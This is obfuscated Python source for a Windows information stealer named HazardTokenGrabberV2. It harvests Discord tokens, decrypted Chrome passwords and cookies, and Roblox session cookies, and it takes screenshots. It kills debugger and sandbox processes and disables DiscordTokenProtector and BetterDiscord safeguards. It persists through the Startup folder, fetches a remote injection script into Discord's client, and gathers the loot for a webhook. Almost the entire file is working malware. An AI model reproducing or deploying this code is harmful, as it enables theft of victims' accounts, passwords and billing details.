import os #line:1
import json #line:2
import httpx #line:3
import winreg #line:4
import ctypes #line:5
import shutil #line:6
import psutil #line:7
import asyncio #line:8
import sqlite3 #line:9
import zipfile #line:10
import threading #line:11
import subprocess #line:12
from sys import argv #line:14
from PIL import ImageGrab #line:15
from random import choice #line:16
from base64 import b64decode #line:17
from tempfile import mkdtemp #line:18
from re import findall ,match #line:19
from Crypto .Cipher import AES #line:20
from win32crypt import CryptUnprotectData #line:21
config ={'updateURL':b64decode (b64decode (b64decode ("WEBHOOK").decode ('utf-8')).decode ('utf-8')).decode ('utf-8'),'protection':"KEY_HERE",'updateBackup':b64decode ("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1JkaW1vL0Rpc2NvcmQtSW5qZWN0aW9uL21hc3Rlci9pbmplY3Rpb24uanM").decode ('utf-8'),'tryv3':True ,'tryv2':True ,'tryv1':True ,'debug':True ,'debugPrograms':["httpdebuggerui","wireshark","fiddler","regedit","cmd","taskmgr","vboxservice","df5serv","processhacker","vboxtray","vmtoolsd","vmwaretray","ida64","ollydbg","pestudio","vmwareuser","vgauthservice","vmacthlp","x96dbg","vmsrvc","x32dbg","vmusrvc","prl_cc","prl_tools","xenservice","qemu-ga","joeboxcontrol","ksdumperclient","ksdumper","joeboxserver"]}#line:74
Victim =os .getlogin ()#line:76
Victim_pc =os .getenv ("COMPUTERNAME")#line:77
ram =str (psutil .virtual_memory ()[0 ]/1024 **3 ).split (".")[0 ]#line:78
disk =str (psutil .disk_usage ('/')[0 ]/1024 **3 ).split (".")[0 ]#line:79
class Functions (object ):#line:82
    @staticmethod #line:83
    def get_headers (OO0O00O0000OOOO00 :str =None ):#line:84
        O0OOOO00OOOO0OOO0 ={"Content-Type":"application/json",}#line:87
        if OO0O00O0000OOOO00 :#line:88
            O0OOOO00OOOO0OOO0 .update ({"Authorization":OO0O00O0000OOOO00 })#line:89
        return O0OOOO00OOOO0OOO0 #line:90
    @staticmethod #line:92
    def get_master_key (OO00000O0000OO0OO )->str :#line:93
        with open (OO00000O0000OO0OO ,"r",encoding ="utf-8")as OO0O00OO00OOOOOO0 :#line:94
            O0OO0O0OOOOO0O0OO =OO0O00OO00OOOOOO0 .read ()#line:95
        O00O00OOOOOO000OO =json .loads (O0OO0O0OOOOO0O0OO )#line:96
        O00OOOO00O0000OOO =b64decode (O00O00OOOOOO000OO ["os_crypt"]["encrypted_key"])#line:98
        O00OOOO00O0000OOO =O00OOOO00O0000OOO [5 :]#line:99
        O00OOOO00O0000OOO =CryptUnprotectData (O00OOOO00O0000OOO ,None ,None ,None ,0 )[1 ]#line:100
        return O00OOOO00O0000OOO #line:101
    @staticmethod #line:103
    def decrypt_val (O00OOOO00O00O0OOO ,O0O0OOO00OOOO00O0 )->str :#line:104
        try :#line:105
            O0OOOOOO000OO0O0O =O00OOOO00O00O0OOO [3 :15 ]#line:106
            O00O0OOOOO0000O00 =O00OOOO00O00O0OOO [15 :]#line:107
            O000OOO000OO0000O =AES .new (O0O0OOO00OOOO00O0 ,AES .MODE_GCM ,O0OOOOOO000OO0O0O )#line:108
            OOOOO00O00000O0O0 =O000OOO000OO0000O .decrypt (O00O0OOOOO0000O00 )#line:109
            OOOOO00O00000O0O0 =OOOOO00O00000O0O0 [:-16 ].decode ()#line:110
            return OOOOO00O00000O0O0 #line:111
        except Exception :#line:112
            return "Failed to decrypt password"#line:113
    @staticmethod #line:115
    def fetch_conf (OOOO0OO00O0O0OOOO :str )->str or bool |None :#line:116
        return config .get (OOOO0OO00O0O0OOOO )#line:117
class HazardTokenGrabberV2 (Functions ):#line:120
    def __init__ (O00O0OOOOOOO0O00O ):#line:121
        O00O0OOOOOOO0O00O .webhook =O00O0OOOOOOO0O00O .fetch_conf ('updateURL')#line:122
        O00O0OOOOOOO0O00O .discordApi ="https://discord.com/api/v9/users/@me"#line:123
        O00O0OOOOOOO0O00O .appdata =os .getenv ("localappdata")#line:124
        O00O0OOOOOOO0O00O .roaming =os .getenv ("appdata")#line:125
        O00O0OOOOOOO0O00O .chrome =O00O0OOOOOOO0O00O .appdata +"\\Google\\Chrome\\User Data\\"#line:126
        O00O0OOOOOOO0O00O .dir =mkdtemp ()#line:127
        O00O0OOOOOOO0O00O .startup_loc =O00O0OOOOOOO0O00O .roaming +"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"#line:128
        O00O0OOOOOOO0O00O .hook_reg ="api/webhooks"#line:129
        O00O0OOOOOOO0O00O .regex =r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"#line:130
        O00O0OOOOOOO0O00O .encrypted_regex =r"dQw4w9WgXcQ:[^\"]*"#line:131
        O00O0OOOOOOO0O00O .sep =os .sep #line:133
        O00O0OOOOOOO0O00O .tokens =[]#line:134
        O00O0OOOOOOO0O00O .robloxcookies =[]#line:135
        os .makedirs (O00O0OOOOOOO0O00O .dir ,exist_ok =True )#line:137
    def try_extract (O00O0O0000O0O00OO ):#line:139
        def O00OO00OO0O0O000O (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO ):#line:140
            try :#line:141
                O00O0O0000O0O00OO (*O00000OOOO0OO000O ,**OO0OOO0OOO000OOOO )#line:142
            except Exception :#line:143
                pass #line:144
        return O00OO00OO0O0O000O #line:145
    async def checkToken (O0OO00OOO0O000O0O ,O0OO00OOOO0O0OO00 :str )->str :#line:147
        try :#line:148
            O0O000OOO0O000OO0 =httpx .get (url =O0OO00OOO0O000O0O .discordApi ,headers =O0OO00OOO0O000O0O .get_headers (O0OO00OOOO0O0OO00 ),timeout =5.0 )#line:153
        except (httpx ._exceptions .ConnectTimeout ,httpx ._exceptions .TimeoutException ):#line:154
            pass #line:155
        if O0O000OOO0O000OO0 .status_code ==200 and O0OO00OOOO0O0OO00 not in O0OO00OOO0O000O0O .tokens :#line:156
            O0OO00OOO0O000O0O .tokens .append (O0OO00OOOO0O0OO00 )#line:157
    async def init (O000O000OO0O000OO ):#line:159
        if O000O000OO0O000OO .fetch_conf ('debug')and AntiDebug ().inVM :#line:160
            os ._exit (0 )#line:161
        await O000O000OO0O000OO .bypassBetterDiscord ()#line:162
        await O000O000OO0O000OO .bypassTokenProtector ()#line:163
        OO0O0OO0OO00O0O0O =[O000O000OO0O000OO .screenshot ,O000O000OO0O000OO .grab_tokens ,O000O000OO0O000OO .grabRobloxCookie ]#line:164
        if O000O000OO0O000OO .fetch_conf ('tryv1'):#line:165
            OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .hide )#line:166
        if O000O000OO0O000OO .fetch_conf ('tryv3'):#line:168
            await O000O000OO0O000OO .killProcesses ()#line:169
        if O000O000OO0O000OO .fetch_conf ('tryv2'):#line:171
            OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .startup )#line:172
        if os .path .exists (O000O000OO0O000OO .chrome +'Default')and os .path .exists (O000O000OO0O000OO .chrome +'Local State'):#line:174
            OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabPassword )#line:175
            OO0O0OO0OO00O0O0O .append (O000O000OO0O000OO .grabCookies )#line:176
        for OOOOOOOOO0OO0OOOO in OO0O0OO0OO00O0O0O :#line:178
            OO0O0O0OO00O0OOO0 =threading .Thread (target =OOOOOOOOO0OO0OOOO ,daemon =True )#line:179
            OO0O0O0OO00O0OOO0 .start ()#line:180
        for O0O0O0OOOOO0O0O0O in threading .enumerate ():#line:181
            try :#line:182
                O0O0O0OOOOO0O0O0O .join ()#line:183
            except RuntimeError :#line:184
                continue #line:185
        O000O000OO0O000OO .neatifyTokens ()#line:186
        await O000O000OO0O000OO .injector ()#line:187
        O000O000OO0O000OO .finish ()#line:188
        shutil .rmtree (O000O000OO0O000OO .dir )#line:189
    def hide (OOO0OO00OO000000O ):#line:191
        ctypes .windll .kernel32 .SetFileAttributesW (argv [0 ],2 )#line:192
    def startup (O000O00OO0OOO0OO0 ):#line:194
        try :#line:195
            shutil .copy2 (argv [0 ],O000O00OO0OOO0OO0 .startup_loc )#line:196
        except Exception :#line:197
            pass #line:198
    async def injector (OO00O0O00OOOOO0O0 ):#line:200
        for _O0O00O00OOOOO0O00 in os .listdir (OO00O0O00OOOOO0O0 .appdata ):#line:201
            if 'discord'in _O0O00O00OOOOO0O00 .lower ():#line:202
                OOOOOOO0000O0O00O =OO00O0O00OOOOO0O0 .appdata +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 #line:203
                OOO0OO000OOO00000 =OOOOOOO0000O0O00O +OO00O0O00OOOOO0O0 .sep #line:204
                for __OO00O0000O0OO0000 in os .listdir (os .path .abspath (OOOOOOO0000O0O00O )):#line:205
                    if match (r'app-(\d*\.\d*)*',__OO00O0000O0OO0000 ):#line:206
                        OOO0OOO0O0OOO00OO =os .path .abspath (OOO0OO000OOO00000 +__OO00O0000O0OO0000 )#line:207
                        O0O000OOO00O0O0OO =OOO0OOO0O0OOO00OO +'\\modules\\discord_desktop_core-3\\discord_desktop_core\\'#line:208
                        if os .path .exists (O0O000OOO00O0O0OO ):#line:209
                            if OO00O0O00OOOOO0O0 .startup_loc not in argv [0 ]:#line:210
                                try :#line:211
                                    os .makedirs (O0O000OOO00O0O0OO +'initiation',exist_ok =True )#line:213
                                except PermissionError :#line:214
                                    pass #line:215
                            if OO00O0O00OOOOO0O0 .hook_reg in OO00O0O00OOOOO0O0 .webhook :#line:216
                                O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook )#line:217
                            else :#line:218
                                O0OO0O000OOO00000 =httpx .get (OO00O0O00OOOOO0O0 .fetch_conf ('updateBackup')).text .replace ("%WEBHOOK%",OO00O0O00OOOOO0O0 .webhook ).replace ("%WEBHOOK_KEY%",OO00O0O00OOOOO0O0 .fetch_conf ('protection'))#line:221
                            try :#line:222
                                with open (O0O000OOO00O0O0OO +'index.js','w',errors ="ignore")as O00000000O0O00O0O :#line:223
                                    O00000000O0O00O0O .write (O0OO0O000OOO00000 )#line:224
                            except PermissionError :#line:225
                                pass #line:226
                            if OO00O0O00OOOOO0O0 .fetch_conf ('tryv3'):#line:227
                                os .startfile (OOO0OOO0O0OOO00OO +OO00O0O00OOOOO0O0 .sep +_O0O00O00OOOOO0O00 +'.exe')#line:228
    async def killProcesses (O00O0O0000O0O0OOO ):#line:230
        O0OO000OOOO000OO0 =O00O0O0000O0O0OOO .fetch_conf ('debugPrograms')#line:231
        for OOOOO0O000O0OOOOO in ['discord','discordtokenprotector','discordcanary','discorddevelopment','discordptb']:#line:232
            O0OO000OOOO000OO0 .append (OOOOO0O000O0OOOOO )#line:233
        for O0000OO0OO000O0O0 in psutil .process_iter ():#line:234
            if any (OO00OO000OOOO0O00 in O0000OO0OO000O0O0 .name ().lower ()for OO00OO000OOOO0O00 in O0OO000OOOO000OO0 ):#line:235
                try :#line:236
                    O0000OO0OO000O0O0 .kill ()#line:237
                except (psutil .NoSuchProcess ,psutil .AccessDenied ):#line:238
                    pass #line:239
    async def bypassTokenProtector (OO00OOO0OO0OOO00O ):#line:241
        O0O0O0OOOOO00O000 =f"{OO00OOO0OO0OOO00O.roaming}\\DiscordTokenProtector\\"#line:243
        if not os .path .exists (O0O0O0OOOOO00O000 ):#line:244
            return #line:245
        O00O000OOO0OOO000 =O0O0O0OOOOO00O000 +"config.json"#line:246
        for O0O0O0OO0O0O000O0 in ["DiscordTokenProtector.exe","ProtectionPayload.dll","secure.dat"]:#line:248
            try :#line:249
                os .remove (O0O0O0OOOOO00O000 +O0O0O0OO0O0O000O0 )#line:250
            except FileNotFoundError :#line:251
                pass #line:252
        if os .path .exists (O00O000OOO0OOO000 ):#line:253
            with open (O00O000OOO0OOO000 ,errors ="ignore")as OOO0OO0OOO0000OO0 :#line:254
                try :#line:255
                    OO0O00000O0O00O00 =json .load (OOO0OO0OOO0000OO0 )#line:256
                except json .decoder .JSONDecodeError :#line:257
                    return #line:258
                OO0O00000O0O00O00 ['Rdimo_just_shit_on_this_token_protector']="https://github.com/Rdimo"#line:259
                OO0O00000O0O00O00 ['auto_start']=False #line:260
                OO0O00000O0O00O00 ['auto_start_discord']=False #line:261
                OO0O00000O0O00O00 ['integrity']=False #line:262
                OO0O00000O0O00O00 ['integrity_allowbetterdiscord']=False #line:263
                OO0O00000O0O00O00 ['integrity_checkexecutable']=False #line:264
                OO0O00000O0O00O00 ['integrity_checkhash']=False #line:265
                OO0O00000O0O00O00 ['integrity_checkmodule']=False #line:266
                OO0O00000O0O00O00 ['integrity_checkscripts']=False #line:267
                OO0O00000O0O00O00 ['integrity_checkresource']=False #line:268
                OO0O00000O0O00O00 ['integrity_redownloadhashes']=False #line:269
                OO0O00000O0O00O00 ['iterations_iv']=364 #line:270
                OO0O00000O0O00O00 ['iterations_key']=457 #line:271
                OO0O00000O0O00O00 ['version']=69420 #line:272
            with open (O00O000OOO0OOO000 ,'w')as OOO0OO0OOO0000OO0 :#line:273
                json .dump (OO0O00000O0O00O00 ,OOO0OO0OOO0000OO0 ,indent =2 ,sort_keys =True )#line:274
            with open (O00O000OOO0OOO000 ,'a')as OOO0OO0OOO0000OO0 :#line:275
                OOO0OO0OOO0000OO0 .write ("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")#line:276
    async def bypassBetterDiscord (O00OO00O0O00O0000 ):#line:278
        O00OO000OOO000OO0 =O00OO00O0O00O0000 .roaming +"\\BetterDiscord\\data\\betterdiscord.asar"#line:279
        if os .path .exists (O00OO000OOO000OO0 ):#line:280
            O0OOO0OOO0OOO0OOO =O00OO00O0O00O0000 .hook_reg #line:281
            with open (O00OO000OOO000OO0 ,'r',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:282
                O0000O0OO0000O000 =OOOOOOOOOO000OOO0 .read ()#line:283
                O0OO00OOOOO0OOOOO =O0000O0OO0000O000 .replace (O0OOO0OOO0OOO0OOO ,'RdimoTheGoat')#line:284
            with open (O00OO000OOO000OO0 ,'w',newline ='',encoding ="cp437",errors ='ignore')as OOOOOOOOOO000OOO0 :#line:285
                OOOOOOOOOO000OOO0 .write (O0OO00OOOOO0OOOOO )#line:286
    def getProductValues (OOO000OOOO00OOOOO ):#line:288
        try :#line:289
            O0O0O0O0000O00OOO =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",creationflags =0x08000000 ).decode ().rstrip ()#line:292
        except Exception :#line:293
            O0O0O0O0000O00OOO ="N/A (Likely Pirated)"#line:294
        try :#line:295
            OOO0000000OO000O0 =subprocess .check_output (r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName",creationflags =0x08000000 ).decode ().rstrip ()#line:297
        except Exception :#line:298
            OOO0000000OO000O0 ="N/A"#line:299
        return [OOO0000000OO000O0 ,O0O0O0O0000O00OOO ]#line:300
    @try_extract #line:302
    def grab_tokens (O0O00O0000OOO00OO ):#line:303
        O0O0O000O0OO000O0 ={'Discord':O0O00O0000OOO00OO .roaming +'\\discord\\Local Storage\\leveldb\\','Discord Canary':O0O00O0000OOO00OO .roaming +'\\discordcanary\\Local Storage\\leveldb\\','Lightcord':O0O00O0000OOO00OO .roaming +'\\Lightcord\\Local Storage\\leveldb\\','Discord PTB':O0O00O0000OOO00OO .roaming +'\\discordptb\\Local Storage\\leveldb\\','Opera':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\','Opera GX':O0O00O0000OOO00OO .roaming +'\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\','Amigo':O0O00O0000OOO00OO .appdata +'\\Amigo\\User Data\\Local Storage\\leveldb\\','Torch':O0O00O0000OOO00OO .appdata +'\\Torch\\User Data\\Local Storage\\leveldb\\','Kometa':O0O00O0000OOO00OO .appdata +'\\Kometa\\User Data\\Local Storage\\leveldb\\','Orbitum':O0O00O0000OOO00OO .appdata +'\\Orbitum\\User Data\\Local Storage\\leveldb\\','CentBrowser':O0O00O0000OOO00OO .appdata +'\\CentBrowser\\User Data\\Local Storage\\leveldb\\','7Star':O0O00O0000OOO00OO .appdata +'\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\','Sputnik':O0O00O0000OOO00OO .appdata +'\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\','Vivaldi':O0O00O0000OOO00OO .appdata +'\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\','Chrome SxS':O0O00O0000OOO00OO .appdata +'\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\','Chrome':O0O00O0000OOO00OO .chrome +'Default\\Local Storage\\leveldb\\','Epic Privacy Browser':O0O00O0000OOO00OO .appdata +'\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\','Microsoft Edge':O0O00O0000OOO00OO .appdata +'\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\','Uran':O0O00O0000OOO00OO .appdata +'\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\','Yandex':O0O00O0000OOO00OO .appdata +'\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\','Brave':O0O00O0000OOO00OO .appdata +'\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\','Iridium':O0O00O0000OOO00OO .appdata +'\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'}#line:327
        for O0OOO0O0000000O0O ,O0000OO0OOOO0OOOO in O0O0O000O0OO000O0 .items ():#line:329
            if not os .path .exists (O0000OO0OOOO0OOOO ):#line:330
                continue #line:331
            O00O0000O0OOOOOOO =O0OOO0O0000000O0O .replace (" ","").lower ()#line:332
            if "cord"in O0000OO0OOOO0OOOO :#line:333
                if os .path .exists (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'):#line:334
                    for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:335
                        if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:336
                            continue #line:337
                        for O0OO00O0O0O0OOO00 in [O00O0OOOO000O0000 .strip ()for O00O0OOOO000O0000 in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0OOOO000O0000 .strip ()]:#line:338
                            for OOOOOOO00O0OOOO00 in findall (O0O00O0000OOO00OO .encrypted_regex ,O0OO00O0O0O0OOO00 ):#line:339
                                OOOOOO0OOOOOO0000 =O0O00O0000OOO00OO .decrypt_val (b64decode (OOOOOOO00O0OOOO00 .split ('dQw4w9WgXcQ:')[1 ]),O0O00O0000OOO00OO .get_master_key (O0O00O0000OOO00OO .roaming +f'\\{O00O0000O0OOOOOOO}\\Local State'))#line:340
                                asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:341
            else :#line:342
                for O00OO00OOOO000OO0 in os .listdir (O0000OO0OOOO0OOOO ):#line:343
                    if O00OO00OOOO000OO0 [-3 :]not in ["log","ldb"]:#line:344
                        continue #line:345
                    for O0OO00O0O0O0OOO00 in [O00O0O0O00OOO00OO .strip ()for O00O0O0O00OOO00OO in open (f'{O0000OO0OOOO0OOOO}\\{O00OO00OOOO000OO0}',errors ='ignore').readlines ()if O00O0O0O00OOO00OO .strip ()]:#line:346
                        for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:347
                            asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:348
        if os .path .exists (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:350
            for O0000OO0OOOO0OOOO ,_O00OO0O00OOOO0OOO ,OO0O0OOO00OOOO000 in os .walk (O0O00O0000OOO00OO .roaming +"\\Mozilla\\Firefox\\Profiles"):#line:351
                for _O000OO0OOO00OO00O in OO0O0OOO00OOOO000 :#line:352
                    if not _O000OO0OOO00OO00O .endswith ('.sqlite'):#line:353
                        continue #line:354
                    for O0OO00O0O0O0OOO00 in [O00O0OO000OO0O0OO .strip ()for O00O0OO000OO0O0OO in open (f'{O0000OO0OOOO0OOOO}\\{_O000OO0OOO00OO00O}',errors ='ignore').readlines ()if O00O0OO000OO0O0OO .strip ()]:#line:355
                        for OOOOOO0OOOOOO0000 in findall (O0O00O0000OOO00OO .regex ,O0OO00O0O0O0OOO00 ):#line:356
                            asyncio .run (O0O00O0000OOO00OO .checkToken (OOOOOO0OOOOOO0000 ))#line:357
    @try_extract #line:359
    def grabPassword (O000OOOOO0OO0OOOO ):#line:360
        OOOOOO0000O00O0O0 =O000OOOOO0OO0OOOO .get_master_key (O000OOOOO0OO0OOOO .chrome +'Local State')#line:361
        OOO00OOOOO00O00OO =O000OOOOO0OO0OOOO .chrome +'default\\Login Data'#line:362
        OOO0OO000OO0OO000 =O000OOOOO0OO0OOOO .dir +O000OOOOO0OO0OOOO .sep +"Loginvault1.db"#line:363
        shutil .copy2 (OOO00OOOOO00O00OO ,OOO0OO000OO0OO000 )#line:365
        O000OO00O0O0O0OOO =sqlite3 .connect (OOO0OO000OO0OO000 )#line:366
        OO0OOO00OO0OOO0OO =O000OO00O0O0O0OOO .cursor ()#line:367
        with open (O000OOOOO0OO0OOOO .dir +"\\Google Passwords.txt","w",encoding ="cp437",errors ='ignore')as O00OOO0O000OOOOOO :#line:368
            OO0OOO00OO0OOO0OO .execute ("SELECT action_url, username_value, password_value FROM logins")#line:369
            for O0O00OO000OO00OOO in OO0OOO00OO0OOO0OO .fetchall ():#line:370
                OO00000OO0O0O00O0 =O0O00OO000OO00OOO [0 ]#line:371
                O0OO0O0O00OOOO0OO =O0O00OO000OO00OOO [1 ]#line:372
                O000O0O0OO0000O0O =O0O00OO000OO00OOO [2 ]#line:373
                O0OOOOOOO00000000 =O000OOOOO0OO0OOOO .decrypt_val (O000O0O0OO0000O0O ,OOOOOO0000O00O0O0 )#line:374
                if OO00000OO0O0O00O0 !="":#line:375
                    O00OOO0O000OOOOOO .write (f"Domain: {OO00000OO0O0O00O0}\nUser: {O0OO0O0O00OOOO0OO}\nPass: {O0OOOOOOO00000000}\n\n")#line:376
        OO0OOO00OO0OOO0OO .close ()#line:377
        O000OO00O0O0O0OOO .close ()#line:378
        os .remove (OOO0OO000OO0OO000 )#line:379
    @try_extract #line:381
    def grabCookies (OO00OOO0O0000O000 ):#line:382
        OO00000OOO0OOO0OO =OO00OOO0O0000O000 .get_master_key (OO00OOO0O0000O000 .chrome +'Local State')#line:383
        O00O00OOO000O0OOO =OO00OOO0O0000O000 .chrome +'default\\Network\\cookies'#line:384
        O0O0O0O000OO0000O =OO00OOO0O0000O000 .dir +OO00OOO0O0000O000 .sep +"Loginvault2.db"#line:385
        shutil .copy2 (O00O00OOO000O0OOO ,O0O0O0O000OO0000O )#line:387
        O0O000O00O0O0OOO0 =sqlite3 .connect (O0O0O0O000OO0000O )#line:388
        OOOO0O000OO00OOO0 =O0O000O00O0O0OOO0 .cursor ()#line:389
        with open (OO00OOO0O0000O000 .dir +"\\Google Cookies.txt","w",encoding ="cp437",errors ='ignore')as O000OOO0OO0000O0O :#line:390
            OOOO0O000OO00OOO0 .execute ("SELECT host_key, name, encrypted_value from cookies")#line:391
            for OOO0OO0O0O000O0O0 in OOOO0O000OO00OOO0 .fetchall ():#line:392
                O000O00O000O0OOOO =OOO0OO0O0O000O0O0 [0 ]#line:393
                O0OOOOO000O0000O0 =OOO0OO0O0O000O0O0 [1 ]#line:394
                O0OOO00O00OOOOO00 =OO00OOO0O0000O000 .decrypt_val (OOO0OO0O0O000O0O0 [2 ],OO00000OOO0OOO0OO )#line:395
                if O000O00O000O0OOOO !="":#line:396
                    O000OOO0OO0000O0O .write (f"Host: {O000O00O000O0OOOO}\nUser: {O0OOOOO000O0000O0}\nCookie: {O0OOO00O00OOOOO00}\n\n")#line:397
                if '_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_'in O0OOO00O00OOOOO00 :#line:398
                    OO00OOO0O0000O000 .robloxcookies .append (O0OOO00O00OOOOO00 )#line:399
        OOOO0O000OO00OOO0 .close ()#line:400
        O0O000O00O0O0OOO0 .close ()#line:401
        os .remove (O0O0O0O000OO0000O )#line:402
    def neatifyTokens (O000O0O00OO0O000O ):#line:404
        O00O0O0O00OO00OOO =open (O000O0O00OO0O000O .dir +"\\Discord Info.txt","w",encoding ="cp437",errors ='ignore')#line:405
        for OOOO0O00OO000O0OO in O000O0O00OO0O000O .tokens :#line:406
            OOOO0OOO00000OO0O =httpx .get (O000O0O00OO0O000O .discordApi ,headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:407
            OOO0OO00000O00OO0 =OOOO0OOO00000OO0O .get ('username')+'#'+str (OOOO0OOO00000OO0O .get ("discriminator"))#line:408
            O000O0OO0O000OOOO =""#line:410
            OO00OOO0OOOOO0O0O =OOOO0OOO00000OO0O ['flags']#line:411
            if (OO00OOO0OOOOO0O0O ==1 ):#line:412
                O000O0OO0O000OOOO +="Staff, "#line:413
            if (OO00OOO0OOOOO0O0O ==2 ):#line:414
                O000O0OO0O000OOOO +="Partner, "#line:415
            if (OO00OOO0OOOOO0O0O ==4 ):#line:416
                O000O0OO0O000OOOO +="Hypesquad Event, "#line:417
            if (OO00OOO0OOOOO0O0O ==8 ):#line:418
                O000O0OO0O000OOOO +="Green Bughunter, "#line:419
            if (OO00OOO0OOOOO0O0O ==64 ):#line:420
                O000O0OO0O000OOOO +="Hypesquad Bravery, "#line:421
            if (OO00OOO0OOOOO0O0O ==128 ):#line:422
                O000O0OO0O000OOOO +="HypeSquad Brillance, "#line:423
            if (OO00OOO0OOOOO0O0O ==256 ):#line:424
                O000O0OO0O000OOOO +="HypeSquad Balance, "#line:425
            if (OO00OOO0OOOOO0O0O ==512 ):#line:426
                O000O0OO0O000OOOO +="Early Supporter, "#line:427
            if (OO00OOO0OOOOO0O0O ==16384 ):#line:428
                O000O0OO0O000OOOO +="Gold BugHunter, "#line:429
            if (OO00OOO0OOOOO0O0O ==131072 ):#line:430
                O000O0OO0O000OOOO +="Verified Bot Developer, "#line:431
            if (O000O0OO0O000OOOO ==""):#line:432
                O000O0OO0O000OOOO ="None"#line:433
            OO00OOOOOO0O00000 =OOOO0OOO00000OO0O .get ("email")#line:434
            O0OO0OO00OOOOO00O =OOOO0OOO00000OO0O .get ("phone")if OOOO0OOO00000OO0O .get ("phone")else "No Phone Number attached"#line:436
            OO0OO000OOOOOOO0O =httpx .get (O000O0O00OO0O000O .discordApi +'/billing/subscriptions',headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).json ()#line:437
            OO00OO0OO00000OOO =False #line:438
            OO00OO0OO00000OOO =bool (len (OO0OO000OOOOOOO0O )>0 )#line:439
            O0OO0OO0O00O0O0OO =bool (len (json .loads (httpx .get (O000O0O00OO0O000O .discordApi +"/billing/payment-sources",headers =O000O0O00OO0O000O .get_headers (OOOO0O00OO000O0OO )).text ))>0 )#line:440
            O00O0O0O00OO00OOO .write (f"{' '*17}{OOO0OO00000O00OO0}\n{'-'*50}\nToken: {OOOO0O00OO000O0OO}\nHas Billing: {O0OO0OO0O00O0O0OO}\nNitro: {OO00OO0OO00000OOO}\nBadges: {O000O0OO0O000OOOO}\nEmail: {OO00OOOOOO0O00000}\nPhone: {O0OO0OO00OOOOO00O}\n\n")#line:441
        O00O0O0O00OO00OOO .close ()#line:442
    def grabRobloxCookie (O0O0OOOOOOO000OO0 ):#line:444
        def OO0OO0OOO0OOO0OOO (O0O0OO00O0000O000 ):#line:445
            try :#line:446
                return subprocess .check_output (fr"powershell Get-ItemPropertyValue -Path {O0O0OO00O0000O000}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",creationflags =0x08000000 ).decode ().rstrip ()#line:449
            except Exception :#line:450
                return None #line:451
        OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKLM')#line:452
        if not OO00000OOOOO000O0 :#line:453
            OO00000OOOOO000O0 =OO0OO0OOO0OOO0OOO (r'HKCU')#line:454
        if OO00000OOOOO000O0 :#line:455
            O0O0OOOOOOO000OO0 .robloxcookies .append (OO00000OOOOO000O0 )#line:456
        if O0O0OOOOOOO000OO0 .robloxcookies :#line:457
            with open (O0O0OOOOOOO000OO0 .dir +"\\Roblox Cookies.txt","w")as OOOO00OO0O00OO00O :#line:458
                for O0OOO000OOO0O0O00 in O0O0OOOOOOO000OO0 .robloxcookies :#line:459
                    OOOO00OO0O00OO00O .write (O0OOO000OOO0O0O00 +'\n')#line:460
    def screenshot (OO00OOO0OOO0OOOO0 ):#line:462
        OO000000O0O0OO0OO =ImageGrab .grab (bbox =None ,include_layered_windows =False ,all_screens =True ,xdisplay =None )#line:468
        OO000000O0O0OO0OO .save (OO00OOO0OOO0OOOO0 .dir +"\\Screenshot.png")#line:469
        OO000000O0O0OO0OO .close ()#line:470
    def finish (O0OO0OOOO0OOOO000 ):#line:472
        for OOOOOO0OO00OOOOOO in os .listdir (O0OO0OOOO0OOOO000 .dir ):#line:473
            if OOOOOO0OO00OOOOOO .endswith ('.txt'):#line:474
                OOOO0OO000O0OOO0O =O0OO0OOOO0OOOO000 .dir +O0OO0OOOO0OOOO000 .sep +OOOOOO0OO00OOOOOO #line:475
                with open (OOOO0OO000O0OOO0O ,"r",errors ="ignore")as O0O00OO00O000OOOO :#line:476
                    OO00OO0000OOO000O =O0O00OO00O000OOOO .read ()#line:477
